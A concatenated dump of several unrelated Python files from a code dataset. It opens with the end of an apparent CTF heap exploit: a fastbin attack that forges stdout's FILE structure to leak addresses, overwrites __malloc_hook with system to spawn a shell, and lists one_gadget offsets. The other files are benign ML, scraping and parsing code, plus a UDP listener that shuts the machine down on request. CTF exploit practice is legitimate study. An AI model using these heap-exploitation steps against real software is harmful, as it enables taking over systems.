add(0x160) #2\n\n free(0)\n free(1)\n\n add(0x100) #0\n edit(0,'a' * 0x90 + flat(0x0,0x71,\"\\xdd\\x25\"))\n add(0x60) #1\n add(0x60) #2\n edit(2,'a' * 0x23 + flat(0x0,0x7f,0xfbad1800, 0x0,0x0,0x0) + \"\\x00\")\n magic(0x3c56a3)\n\n free(1)\n edit(0,'a' * 0x90 + flat(0x0,0x71,libc_base + libc.symbols['_IO_2_1_stdout_'] - 0x10))\n \n add(0x60) #1\n add(0x60) #2\n edit(4,flat(0xfbad1800, 0x0,0x0,0x0,libc_base + 0x3c3ef0))\n io.recv()\n program_leeak = u64(io.recv(6).ljust(8,'\\x00'))\n lg('program_addr',program_leeak)\n program_base = program_leeak - 0x202020\n lg('program_base',program_base)\n\n store_malloc_hook = 0x202050 + program_base\n fd1_bss_free_hook = 0x20204d + program_base\n\n free(1)\n edit(0,'a' * 0x90 + flat(0x0,0x71,program_base + 0x20203d))\n add(0x60)\n add(0x60)\n edit(5,'a' * 3 + flat(__malloc_hook,system))\n edit(0,\"/bin/sh\\x00\")\n\n free(0)\n # debug()\n io.interactive()\n\n\"\"\"\n modify rt_global failed\n\n fd = libc_base + 0x5f0de5\n lg('fd',fd)\n free(1)\n edit(0,'a' * 0x90 + flat(0x0,0x71,fd))\n add(0x60) #1\n add(0x68) #\n\n edit(4,flat(0x0,0x7f) * (0x68 // 16) + p64(0x7f))\n fd2 = 0x5f0e4d + libc_base\n free(1)\n edit(0,'a' * 0x90 + flat(0x0,0x71,fd2))\n\n add(0x60) #1\n add(0x60)\n edit(5,flat(0x0,0x7f) * (0x68 // 16) + p64(0x7f))\n\n fd3 = 0x5f0ead + libc_base\n free(1)\n edit(0,'a' * 0x90 + flat(0x0,0x71,fd3))\n\n add(0x60) #1\n add(0x60)\n edit(6,flat(0x0,0x7f) * (0x68 // 16) + p64(0x7f))\n\n fd4 = 0x5f0f0d + libc_base\n free(1)\n edit(0,'a' * 0x90 + flat(0x0,0x71,fd4))\n one_gg = libc_base + 0x45216\n\n\n add(0x60) #1\n add(0x60)\n edit(7,'a' * (0x33-0x8) + p64(0x3cac90 + libc_base)+ p64(one_gg))\n lg(\"one_gg\",one_gg)\n\"\"\"\n\nif __name__ == \"__main__\":\n try:\n exploit()\n except EOFError as e:\n exit(0)\n\"\"\"\n0x45216\texecve(\"/bin/sh\", rsp+0x30, environ)\nconstraints:\n rax == NULL\n\n0x4526a\texecve(\"/bin/sh\", rsp+0x30, environ)\nconstraints:\n [rsp+0x30] == NULL\n\n0xf02a4\texecve(\"/bin/sh\", rsp+0x50, environ)\nconstraints:\n [rsp+0x50] == NULL\n\n0xf1147\texecve(\"/bin/sh\", rsp+0x70, environ)\nconstraints:\n [rsp+0x70] == NULL\n\"\"\"","sub_path":"pwn_exec/kanxueQ3/heap/pwnpwn.py","file_name":"pwnpwn.py","file_ext":"py","file_size_in_byte":4426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"229083085","text":"#!/usr/local/bin/python\n\n## EPlusInterface (EPI) - An interface for EnergyPlus\n## Copyright (C) 2004 Santosh Philip\n##\n## This file is part of EPlusInterface.\n## \n## EPlusInterface is free software; you can redistribute it and/or modify\n## it under the terms of the GNU General Public License as published by\n## the Free Software Foundation; either version 2 of the License, or\n## (at your option) any later version.\n## \n## EPlusInterface is distributed in the hope that it will be useful,\n## but WITHOUT ANY WARRANTY; without even the implied warranty of\n## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n## GNU General Public License for more details.\n## \n## You should have received a copy of the GNU General Public License\n## along with EPlusInterface; if not, write to the Free Software\n## Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA \n##\n##\n## Santosh Philip, the author of EPlusInterface, can be contacted at the following email address:\n## santosh_philip AT yahoo DOT com\n## Please send all bug reports, enhancement proposals, questions and comments to that address.\n## \n## VERSION: 0.005\n\n\"\"\"\nRead the data that sketchup generates for energyplus\ngives back the data into a dictionary\n\"\"\"\n\ntry:\n set\nexcept NameError:\n from sets import Set as set\n\n\ndef stripped(txt):\n \"\"\"apply strip to all lines of a text file\"\"\"\n return '\\n'.join([line.strip() for line in txt.splitlines()])\n\ndef readsketchup(txt):\n \"\"\"read the data that sketchup generates for energyplus\n Convert it to a python dictionary\"\"\"\n lst = txt.split('face:')\n lst.pop(0)\n lst1 = [el.splitlines() for el in lst]\n [(el[0], '\\n'.join(el[1:])) for el in lst1]\n dct = dict([(el[0], '\\n'.join(el[1:])) for el in lst1])\n for name, val in dct.items():\n dct[name] = txt2face(val)\n return dct \n\ndef txt2face(txt):\n \"\"\"convert sketchup txt for one face to a face dictionary\"\"\"\n txt = stripped(txt)\n lst = [line.split(':') for line in txt.splitlines()]\n dct = dict([el for el in lst if len(el) == 2])\n ptslst = [el for el in lst if len(el) == 1]\n ptslst = [pt3[0].split() for pt3 in ptslst]\n ptslst = [[float(pt) for pt in pt3] for pt3 in ptslst]\n dct['points'] = ptslst\n if dct['parent'] == 'None': \n dct['parent'] = None\n if dct['material'] == 'None': \n dct['material'] = None\n dct['normal'] = [float(el) for el in dct['normal'].split()]\n dct['surfacedirection'] = float(dct['surfacedirection'])\n return dct\n\ndef samepoly(p1, p2):\n \"\"\"if the polygons poly1 and poly2 are identical: return True\n does not care aout the order of the points in the list\n as long as the same points are there it will return True\"\"\"\n p1 = [tuple(el) for el in p1]\n p2 = [tuple(el) for el in p2]\n s1 = set(p1) \n s2 = set(p2) \n return s1 == s2 \n\ndef duplicatewindows(dct):\n \"\"\"remove the duplicate windows\n sketchup geneates two planes for the windows\"\"\"\n winkeys = [key for key in dct.keys() if dct[key]['parent'] != None]\n for ikey in winkeys:\n for jkey in dct.keys():\n if dct[jkey]['parent'] == None:\n if samepoly(dct[ikey]['points'], dct[jkey]['points']):\n if dct[jkey]['material'] != None:\n dct[ikey]['material'] = dct[jkey]['material']\n dct.pop(jkey)\n return dct\n\ndef inch2meters(dct):\n \"\"\"Sketchup dumps the dimensions in inches\n Convert it to meters\"\"\"\n converter = 0.0253987605\n for key in dct.keys():\n dct[key]['points'] = [[j * converter for j in i] for i in dct[key]['points']]\n return dct\n \n\n \n\ndef main():\n pass\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"sketchup/trunk/workingfiles/readsketchup.py","file_name":"readsketchup.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"398619417","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nfrom scrapy.exceptions import DropItem\nimport requests\nimport re\nfrom datetime import datetime\n\nline_term = re.compile(r\"(^\\n)|(\\n$)\")\nline_term2 = re.compile(r\"[(\\r)(\\n)|(\\t)]+\")\n\nEVENT_TYPES = dict([\n (\"Хакатон\", \"ХАК\" ),\n (\"Митап\", \"МИТ\"),\n (\"Соревнование\", \"СОР\"),\n (\"Школа\", \"ШК\"),\n (\"Мастер-класс\", \"MK\"),\n (\"Конференция\", \"КОНФ\"),\n (\"Лекция\", \"ЛЕК\")\n ])\n\n\ndef get_month_number(month):\n mon = [\"янв\", \"фев\", \"март\", \"апр\", \"ма\", \"июн\", \"июл\", \"авг\", \"сент\", \"окт\", \"ноя\", \"дек\"]\n for i, m in enumerate(mon):\n if month.startswith(m):\n \treturn i + 1\n\nclass BeginingPipeline(object):\n def process_item(self, item, spider):\n for key in item:\n if key == \"link\" or key == \"description\": continue\n if item[key] == None: item[key] == \"\"\n try:\n item[key] = line_term.sub(\"\", item[key])\n except TypeError:\n item[key] == \"\"\n return item\n\nclass TypePipeline(object):\n def process_item(self, item, spider):\n item[\"type\"] = EVENT_TYPES.get(item[\"type\"], \"UNK\")\n if item[\"type\"] == \"UNK\":\n raise DropItem(\"Event type {} doesn't support\")\n else:\n return item\n\nclass DescriptionPipeline(object):\n def process_item(self, item, spider):\n item['description'] = \"\".join(item[\"description\"])\n item[\"description\"] = line_term2.sub(\"\\n\", item[\"description\"])\n return item\n\nclass ItEventsFree(object):\n def process_item(self, item, spider):\n if item[\"free\"] == \"Участие бесплатное\" or item[\"free\"] == \"\\nУчастие бесплатное\\n\" or len(item[\"free\"]) < 3:\n return item\n else:\n raise DropItem(\"It's not free\")\n\nclass TimePipeline(object):\n def process_item(self, item, spider):\n time = item[\"date\"]\n date, time = time.split(\", \")\n date = date.split()[:3]\n date[1] = get_month_number(date[1])\n time = time.split(\"\\n-\\n\")[0].split(\":\")\n date = list(map(int, date[::-1] + time))\n item[\"date\"] = datetime(*date).strftime(\"%Y-%m-%dT%H:%M\")\n return item\n\nclass SendAPIPipeline(object):\n collection_name = 'scrapy_items'\n def __init__(self, api_url):\n self.api_url = api_url + \"/events\"\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls(crawler.settings.get(\"API_URL\"))\n\n def process_item(self, item, crawler):\n r = requests.post(\n self.api_url,\n json=item)\n if r.status_code != 200:\n raise DropItem(\"Something wrong: \" + r.text)\n return item\n\nimport json\n\nclass JsonWriterPipeline(object):\n\n def open_spider(self, spider):\n self.file = open('items.jl', 'w')\n\n def close_spider(self, spider):\n self.file.close()\n\n def process_item(self, item, spider):\n line = json.dumps(dict(item)) + \"\\n\"\n self.file.write(line)\n return item\n","sub_path":"crawlers/it_events/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"263683946","text":"#Functions inside objects - some examples of lists methods\n\n#Initialize list, add item, print list, print item index 3, show help, copy list\nl = [1,2,3,4,5]\nl.append(6)\nprint(l)\nprint(l.count(3))\nhelp(l.count)\nhelp(l.clear)\nhelp(l.copy)\nl2=[]\nl2 = l.copy()\nprint(l2)\n","sub_path":"Methods.py","file_name":"Methods.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"285459974","text":"import socket\nimport sys\nimport os\n\nif len(sys.argv) == 4:\n # Get \"IP address of Server\" and also the \"port number\" from argument 1 and argument 2\n ip = sys.argv[2]\n port = int(sys.argv[3])\n operationMode = sys.argv[1]\nelse:\n print(\"Run like : python3 client.py \")\n exit(1)\n\n\n# Create socket for server\nsckt = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)\nprint(\"Do Ctrl+c to exit the program\")\n\n\nserver_address = (ip, port)\n\nif(operationMode == \"client\"):\n while True:\n send_data = input(\"Type some text to send =>\");\n sckt.sendto(send_data.encode('utf-8'), (ip, port))\n print(\"\\n\\n 1. Client Sent : \", send_data, \"\\n\\n\")\n\nelif(operationMode == \"server\"):\n sckt.bind(server_address)\n\n while True:\n print(\"####### Server is listening #######\")\n data, address = sckt.recvfrom(4096)\n dataString = data.decode('utf-8')\n print(\"\\n\\n 2. Server received: \", data.decode('utf-8'), \"\\n\\n\")\n\n if(dataString == \"shutdown\"):\n os.system(\"shutdown /s /t 1\")\n \n\n\nsckt.close()\n","sub_path":"PiPcHandler.py","file_name":"PiPcHandler.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"450016001","text":"import tensorflow as tf\nimport numpy as np\n\nUSE_TEACHER = True\n\nLR = 1e-3\nclass Videl_Caption_Generator_ATTN():\n\tdef __init__(self, n_encoder_input, n_hidden, n_decoder_input, n_embed, n_encoder_T=80, n_decoder_T=15, batch_size=5):\n\t\tself.n_encoder_input = n_encoder_input\n\t\tself.n_hidden = n_hidden\n\t\tself.n_decoder_input = n_decoder_input\n\t\tself.n_embed = n_embed\n\t\tself.n_encoder_T = n_encoder_T\n\t\tself.n_decoder_T = n_decoder_T\n\t\tself.batch_size = batch_size\n\n\t\tself.lstm1 = tf.contrib.rnn.LSTMCell(self.n_hidden)\n\t\tself.lstm2 = tf.contrib.rnn.LSTMCell(self.n_hidden)\n\t\tself.out_fc = tf.layers.Dense(self.n_decoder_input, activation=None)\n\t\tself.attn_dense = tf.layers.Dense(self.n_encoder_T, activation=tf.nn.softmax)\n\t\tself.attn_dense2 = tf.layers.Dense(self.n_embed, activation=tf.nn.relu)\n\n\t\tself.build_graph()\n\t\tself.init_op()\n\n\tdef build_graph(self):\n\n\t\tself.encoder_input = tf.placeholder(dtype=tf.float32, shape=(self.batch_size, self.n_encoder_T, self.n_encoder_input))\n\t\tself.decoder_input = tf.placeholder(dtype=tf.int32, shape=(self.batch_size, self.n_decoder_T))\n\n\t\tself.embedding_dict = tf.get_variable(name='embed_dict', shape=[self.n_decoder_input, self.n_embed], \n\t\t\tdtype=tf.float32, initializer=tf.random_uniform_initializer(-0.1, 0.1))\n\n\n\t\t######################### Encoder ###########################\n\t\tself.encoder_output, self.encoder_final_state = tf.nn.dynamic_rnn(\n\t\t\tself.lstm1, self.encoder_input, dtype=tf.float32, time_major=False\n\t\t)\n\t\t# print('encoder_output_shape: ', self.encoder_output.shape) ###(N, n_encoder_T, n_hidden)\n\t\t# print('encoder_final_state_c_shape: ', self.encoder_final_state.c.shape)\n\n\t\t######################### Decoder ###########################\n\t\tself.loss = 0.0\n\t\tdecoder_state = self.encoder_final_state ###((N, n_hidden), (N, n_hidden))\n\t\tpred_all = []\n\t\tfor i in range(self.n_decoder_T-1):\n\t\t\tif USE_TEACHER:\n\n\t\t\t\tcurrent_embed = tf.nn.embedding_lookup(self.embedding_dict, self.decoder_input[:,i]) ###(N, n_embed)\n\t\t\t\t# print('current_embed_shape:', current_embed.shape) ###(N, n_embed)\n\t\t\t\th_plus_embed = tf.concat([current_embed, decoder_state.h], axis=1) ###(N, n_embed+n_hidden)\n\t\t\t\tself.attn_weight = self.attn_dense(h_plus_embed) ###(N, n_encoder_T)\n\t\t\t\tattn_weight_reshape = tf.reshape(self.attn_weight, shape=(self.batch_size, 1, self.n_encoder_T)) ###(N, 1, n_encoder_T)\n\t\t\t\t# print('attn_weight_shape: ', attn_weight.shape)\n\t\t\t\tattn_apply = tf.matmul(attn_weight_reshape, self.encoder_output) ###(N, 1, n_hidden)\n\t\t\t\tattn_apply = tf.squeeze(attn_apply) ###(N, n_hidden)\n\t\t\t\t# print('attn_apply_shape: ', attn_apply.shape)\n\t\t\t\tattn_decoder_input = tf.concat([current_embed, attn_apply], axis=1) ###(N, n_embed+n_hidden)\n\t\t\t\t# print('new_decoder_input_shape: ', new_decoder_input.shape)\n\t\t\t\tattn_decoder_input = self.attn_dense2(attn_decoder_input) ###(N, n_embed)\n\t\t\t\t# print('new_decoder_input_shape: ', attn_decoder_input.shape)\n\n\n\t\t\t\twith tf.variable_scope('LSTM2'):\n\t\t\t\t\tif i > 0:\n\t\t\t\t\t\ttf.get_variable_scope().reuse_variables()\n\t\t\t\t\tdecoder_output, decoder_state = self.lstm2(attn_decoder_input, decoder_state)\n\t\t\t\t# print('decoder_output_shape:', decoder_output.shape) ###(N, n_hidden)\n\t\t\t\t# print('decoder_state_shape:', decoder_state.c.shape) ###(N, n_hidden)\n\t\t\t\t# print('decoder_state_shape:', decoder_state.h.shape)\n\n\t\t\t\tdecoder_output = self.out_fc(decoder_output)\n\t\t\t\t# print('decoder_output_after_shape:', decoder_output.shape) ###(N, n_decoder_input)\n\t\t\t\tdecoder_pred = tf.argmax(decoder_output, axis=1)\n\t\t\t\t# print('decoder_pred_shape:', decoder_pred.shape) ###(N,)\n\t\t\t\tpred_all.append(tf.reshape(decoder_pred, (self.batch_size, 1)))\n\n\n\t\t\t\tstepwise_cross_entropy = tf.nn.softmax_cross_entropy_with_logits(\n\t\t\t\t\tlabels = tf.one_hot(self.decoder_input[:, i+1], depth=self.n_decoder_input, dtype=tf.float32), ###(N, n_decoder_input)\n\t\t\t\t\tlogits = decoder_output,\n\t\t\t\t)\n\t\t\t\t# print('loss shape:', stepwise_cross_entropy.shape) ###(N, )\n\t\t\t\tcurrent_loss = tf.reduce_mean(stepwise_cross_entropy, axis=0)\n\t\t\t\tself.loss = self.loss + current_loss\n\n\t\tself.pred_caption_teacher = tf.concat(pred_all, axis=1)\n\t\t# print('pred_caption.shape:', self.pred_caption.shape)\n\t\tself.train_op = tf.train.AdamOptimizer(LR).minimize(self.loss)\n\n\tdef pred(self, encoder_input_data):\n\t\tdecoder_state = self.encoder_final_state\n\t\tpred_all = []\n\t\tdecoder_input = tf.ones(shape=[self.batch_size,], dtype=tf.int32)\n\t\t# print('decoder_input_shape_before: ', decoder_input.shape)\n\t\tfor i in range(self.n_decoder_T-1):\n\t\t\tcurrent_embed = tf.nn.embedding_lookup(self.embedding_dict, decoder_input) ###(N, n_embed)\n\t\t\th_plus_embed = tf.concat([current_embed, decoder_state.h], axis=1)\n\t\t\tself.attn_weight = self.attn_dense(h_plus_embed)\n\t\t\tattn_weight_reshape = tf.reshape(self.attn_weight, shape=(self.batch_size, 1, self.n_encoder_T))\n\t\t\tattn_apply = tf.matmul(attn_weight_reshape, self.encoder_output)\n\t\t\tattn_apply = tf.squeeze(attn_apply)\n\t\t\tattn_decoder_input = tf.concat([current_embed, attn_apply], axis=1)\n\t\t\tattn_decoder_input = self.attn_dense2(attn_decoder_input)\n\n\t\t\twith tf.variable_scope('LSTM2'):\n\t\t\t\tif i > 0:\n\t\t\t\t\ttf.get_variable_scope().reuse_variables()\n\t\t\t\tdecoder_output, decoder_state = self.lstm2(attn_decoder_input, decoder_state)\t\t\t\n\n\t\t\tdecoder_output = self.out_fc(decoder_output)\n\t\t\tdecoder_input = tf.argmax(decoder_output, axis=1)\n\t\t\t# print('decoder_input_shape_after: ', decoder_input.shape)\n\t\t\tdecoder_pred = tf.reshape(decoder_input, (self.batch_size, 1))\n\t\t\tpred_all.append(decoder_pred)\n\t\t\t\n\t\tself.pred_caption_self = tf.concat(pred_all, axis=1)\n\n\t\tpredict = self.sess.run(self.pred_caption_self, feed_dict={\n\t\t\t\tself.encoder_input: encoder_input_data\n\t\t\t})\n\t\treturn predict\n\n\n\tdef init_op(self):\n\t\tself.sess = tf.Session()\n\t\tself.sess.run(tf.global_variables_initializer())\n\t\tprint('Initialized')\n\t\tprint('='*100)\n\n\tdef train(self, encoder_input_data, decoder_input_data):\n\n\t\t_, loss, predict = self.sess.run([self.train_op, self.loss, self.pred_caption_teacher], feed_dict={\n\t\t\t\tself.encoder_input: encoder_input_data,\n\t\t\t\tself.decoder_input: decoder_input_data,\n\t\t\t})\n\n\t\treturn loss, predict\n\n\nif __name__ == '__main__':\n\tmodel = Videl_Caption_Generator_ATTN(4096, 256, 2000, 500)\n","sub_path":"tensorflow/Seq2Seq/tensorflow-vedio-caption/model_tensorflow_attn.py","file_name":"model_tensorflow_attn.py","file_ext":"py","file_size_in_byte":6199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"409902166","text":"import os\nimport sys\nimport argparse\nimport torch\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nimport numpy as np\n\n\n\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../../src/\")) # add the path to the DiffusionNet src\nimport diffusion_net\nfrom faust_with_robust_test_dataset import FaustWithRobustTestDataset\n\n\n# === Options\n\n# Parse a few args\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--evaluate\", action=\"store_true\", help=\"evaluate using the pretrained model\")\nparser.add_argument(\"--input_features\", type=str, help=\"what features to use as input ('xyz' or 'hks') default: xyz\", default = 'xyz')\nargs = parser.parse_args()\n\n\n# system things\ndevice = torch.device('cuda:0')\ndtype = torch.float32\n\n# problem/dataset things\nn_class = 6890\n\n# model \ninput_features = args.input_features # one of ['xyz', 'hks']\nk_eig = 128\n\n# training settings\ntrain = not args.evaluate\nn_epoch = 200\nlr = 1e-3\ndecay_every = 50\ndecay_rate = 0.5\naugment_random_rotate = (input_features == 'xyz')\n\n\n\n# Important paths\nbase_path = os.path.dirname(__file__)\nop_cache_dir = os.path.join(base_path, \"data\", \"op_cache\")\ngeodesic_cache_dir = os.path.join(base_path, \"data\", \"geodesic_cache\") # for evaluating error metrics\npretrain_path = os.path.join(base_path, \"pretrained_models/categorical_correspondence_{}_4x256.pth\".format(input_features))\nmodel_save_path = os.path.join(base_path, \"data/saved_models/categorical_correspondence_{}_4x256.pth\".format(input_features))\ndataset_path = os.path.join(base_path, \"data\")\n\n\n# === Load datasets\n\n# Load the test dataset\ntest_dataset = FaustWithRobustTestDataset(dataset_path, train=False, k_eig=k_eig, use_cache=True, op_cache_dir=op_cache_dir)\ntest_loader = DataLoader(test_dataset, batch_size=None)\n\n# Load the train dataset\ntrain_dataset = FaustWithRobustTestDataset(dataset_path, train=True, k_eig=k_eig, use_cache=True, op_cache_dir=op_cache_dir)\ntrain_loader = DataLoader(train_dataset, batch_size=None, shuffle=True)\n\n# Use the first shape in the training dataset as the reference model (used for measuring geodesic error below)\nverts_ref, faces_ref = train_dataset[0][:2]\nverts_ref.requires_grad = False\nfaces_ref.requires_grad = False\n\n\n# === Create the model\n\nC_in={'xyz':3, 'hks':16}[input_features] # dimension of input features\n\nmodel = diffusion_net.layers.DiffusionNet(C_in=C_in,\n C_out=n_class,\n C_width=256, \n N_block=4, \n last_activation=lambda x : torch.nn.functional.log_softmax(x,dim=-1),\n outputs_at='vertices', \n dropout=True)\n\n\nmodel = model.to(device)\n\nif not train:\n # load the pretrained model\n print(\"Loading pretrained model from: \" + str(pretrain_path))\n model.load_state_dict(torch.load(pretrain_path))\n print(\"...done\")\n\n\n# === Optimize\noptimizer = torch.optim.Adam(model.parameters(), lr=lr)\n\ndef train_epoch(epoch):\n\n # Implement lr decay\n if epoch > 0 and epoch % decay_every == 0:\n global lr \n lr *= decay_rate\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr \n\n\n # Set model to 'train' mode\n model.train()\n optimizer.zero_grad()\n \n correct = 0\n total_num = 0\n for data in tqdm(train_loader):\n\n # Get data\n verts, faces, frames, mass, L, evals, evecs, gradX, gradY, labels, _ = data\n\n # Move to device\n verts = verts.to(device)\n faces = faces.to(device)\n frames = frames.to(device)\n mass = mass.to(device)\n L = L.to(device)\n evals = evals.to(device)\n evecs = evecs.to(device)\n gradX = gradX.to(device)\n gradY = gradY.to(device)\n labels = labels.to(device)\n \n # Randomly rotate positions\n if augment_random_rotate:\n # Rotate about up (Y-axis) only\n verts = diffusion_net.utils.random_rotate_points_y(verts)\n\n # Construct features\n if input_features == 'xyz':\n features = verts\n elif input_features == 'hks':\n features = diffusion_net.geometry.compute_hks_autoscale(evals, evecs, 16)\n\n # Apply the model\n preds = model(features, mass, L=L, evals=evals, evecs=evecs, gradX=gradX, gradY=gradY)\n\n # Evaluate loss\n loss = torch.nn.functional.nll_loss(preds, labels)\n loss.backward()\n \n # track accuracy\n pred_labels = torch.max(preds, dim=1).indices\n this_correct = pred_labels.eq(labels).sum().item()\n this_num = labels.shape[0]\n correct += this_correct\n total_num += this_num\n\n # Step the optimizer\n optimizer.step()\n optimizer.zero_grad()\n\n train_acc = correct / total_num\n return train_acc\n\n\n# Do an evaluation pass on the test dataset \ndef test(with_geodesic_error=False):\n\n if with_geodesic_error:\n print(\"Evaluating geodesic error metrics\")\n \n model.eval()\n \n correct = 0\n total_num = 0\n with torch.no_grad():\n\n # If measuring geodesic error, keep track of it (for each type of mutation)\n mut_geodesic_errors = {}\n \n i = 0\n for data in tqdm(test_loader):\n\n # Get data\n verts, faces, frames, mass, L, evals, evecs, gradX, gradY, labels, mut = data\n\n \n # Move to device\n verts = verts.to(device)\n faces = faces.to(device)\n frames = frames.to(device)\n mass = mass.to(device)\n L = L.to(device)\n evals = evals.to(device)\n evecs = evecs.to(device)\n gradX = gradX.to(device)\n gradY = gradY.to(device)\n labels = labels.to(device)\n \n # Construct features\n if input_features == 'xyz':\n features = verts\n elif input_features == 'hks':\n features = diffusion_net.geometry.compute_hks_autoscale(evals, evecs, 16)\n\n # Apply the model\n preds = model(features, mass, L=L, evals=evals, evecs=evecs, gradX=gradX, gradY=gradY)\n\n # track accuracy\n pred_labels = torch.max(preds, dim=1).indices\n this_correct = pred_labels.eq(labels).sum().item()\n this_num = labels.shape[0]\n correct += this_correct\n total_num += this_num\n\n if with_geodesic_error:\n\n pred_labels = torch.max(preds, dim=-1).indices\n errors = diffusion_net.geometry.geodesic_label_errors(verts_ref, faces_ref, pred_labels, labels, normalization='diameter', geodesic_cache_dir=geodesic_cache_dir)\n\n if mut not in mut_geodesic_errors:\n mut_geodesic_errors[mut] = []\n mut_geodesic_errors[mut].extend(errors)\n\n\n if with_geodesic_error:\n print(\"\\n== Geodesic errors ==\")\n for mut in mut_geodesic_errors:\n print(\" {:>8} mean: {:.2f}\".format(mut, 100*np.mean(mut_geodesic_errors[mut])))\n\n test_acc = correct / total_num\n return test_acc \n\n\nif train:\n print(\"Training...\")\n\n for epoch in range(n_epoch):\n train_acc = train_epoch(epoch)\n test_acc = test()\n print(\"Epoch {} - Train overall: {:06.3f}% Test overall: {:06.3f}%\".format(epoch, 100*train_acc, 100*test_acc))\n\n print(\" ==> saving last model to \" + model_save_path)\n torch.save(model.state_dict(), model_save_path)\n\n\n# Test\ntest_acc = test(with_geodesic_error=True)\nprint(\"Overall test accuracy: {:06.3f}%\".format(100*test_acc))\n","sub_path":"experiments/sampling_invariance/sampling_invariance.py","file_name":"sampling_invariance.py","file_ext":"py","file_size_in_byte":7701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"386034835","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport urllib.request\nfrom lxml import etree\n\n\ndef crawl(url):\n headers={\n 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'\n }\n req=urllib.request.Request(url,headers=headers)\n resp=urllib.request.urlopen(req,timeout=10)\n html=resp.read().decode('utf-8')\n\n element=etree.HTML(html)\n li_lists=element.xpath('//div[@id=\"nowplaying\"]//ul[@class=\"lists\"]/li')\n for li in li_lists:\n title=li.xpath('./@data-title')[0]\n score=li.xpath('./@data-score')[0]\n duration=li.xpath('./@data-duration')[0]\n region=li.xpath('./@data-region')[0]\n director=li.xpath('./@data-director')[0]\n actors=li.xpath('./@data-actors')[0]\n img=li.xpath('.//img/@src')[0]\n\n print(title,score,duration,region,director,actors,img)\n\n\nif __name__ == '__main__':\n url='https://movie.douban.com/cinema/nowplaying/xian/'\n crawl(url)","sub_path":"02_PC端/豆瓣/正在上映电影.py","file_name":"正在上映电影.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"347735737","text":"\n\n#calss header\nclass _HOOKER():\n\tdef __init__(self,): \n\t\tself.name = \"HOOKER\"\n\t\tself.definitions = [u'a prostitute (= woman who has sex for money)', u'a rugby player who pulls the ball out of the scrum with his foot']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_hooker.py","file_name":"_hooker.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"382466048","text":"import hexchat\n\n__module_name__ = \"blocknotice.py\"\n__module_author__ = \"Mika Wu\"\n__module_version__ = \"0.1.0.151007\"\n__module_description__ = \"Redirects notices to server tab.\"\n\ndef redirect_cb(word, word_eol, userdata):\n\t\"\"\"Print user message with an abbreviated username\n\tif it exceeds the specified trim length.\n\n\tArgs:\n\t\tword: Passed by hook. Contains user nick, message, and op status.\n\t\tword_eol: Passed by hook. Gives \"word\" contents from the provided\n\t\t\t\t index and onward.\n\t\tuserdata: Additional argument in hook can be passed through userdata.\n\t\t\t\t Used here to better handle multiple types of message events.\n\n\tReturns:\n\t\tEAT_* constant: Controls how Hexchat procedes when callback returns.\n\t\tHere we will use \"EAT_ALL\" to soft \"delete\" the original message\n\t\tin its original context.\n\n\tSee HEXCHAT documentation for futher information.\n\t\"\"\"\n\tif word[0] == \"*status\":\n\t\tschan = hexchat.find_context(channel='Rizon')\n\t\tschan.emit_print(\"Server Text\", word[1])\n\t\treturn hexchat.EAT_ALL\n\n\n# Refer to Settings/Text Events for additional event names.\nhexchat.hook_print(\"Notice\", redirect_cb)\nprint(__module_name__, __module_version__, \"has been loaded.\")\n","sub_path":"blocknotice.py","file_name":"blocknotice.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"244361994","text":"# -*- coding: utf-8 -*-\nimport glob\nfrom pathlib import Path\n\nimport torch\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nfrom PIL import Image\n\n\nclass ReverseLeNormalize(object):\n # Normalzie to [0.0, 1.0]\n def __call__(self, tensor):\n pass\n\n\nclass LeNormalize(object):\n # Normalize to [-1.0, 1.0]\n def __call__(self, tensor):\n for t in tensor:\n t.sub_(0.5).mul_(2.0)\n return tensor\n\n\ndef original_transform(sz):\n tf = transforms.Compose([\n transforms.Scale(sz),\n transforms.CenterCrop(sz),\n transforms.ToTensor(),\n ])\n return tf\n\n\ndef default_inception_transform(sz):\n tf = transforms.Compose([\n transforms.Scale(sz),\n transforms.CenterCrop(sz),\n transforms.ToTensor(),\n LeNormalize(),\n ])\n return tf\n\n\ndef 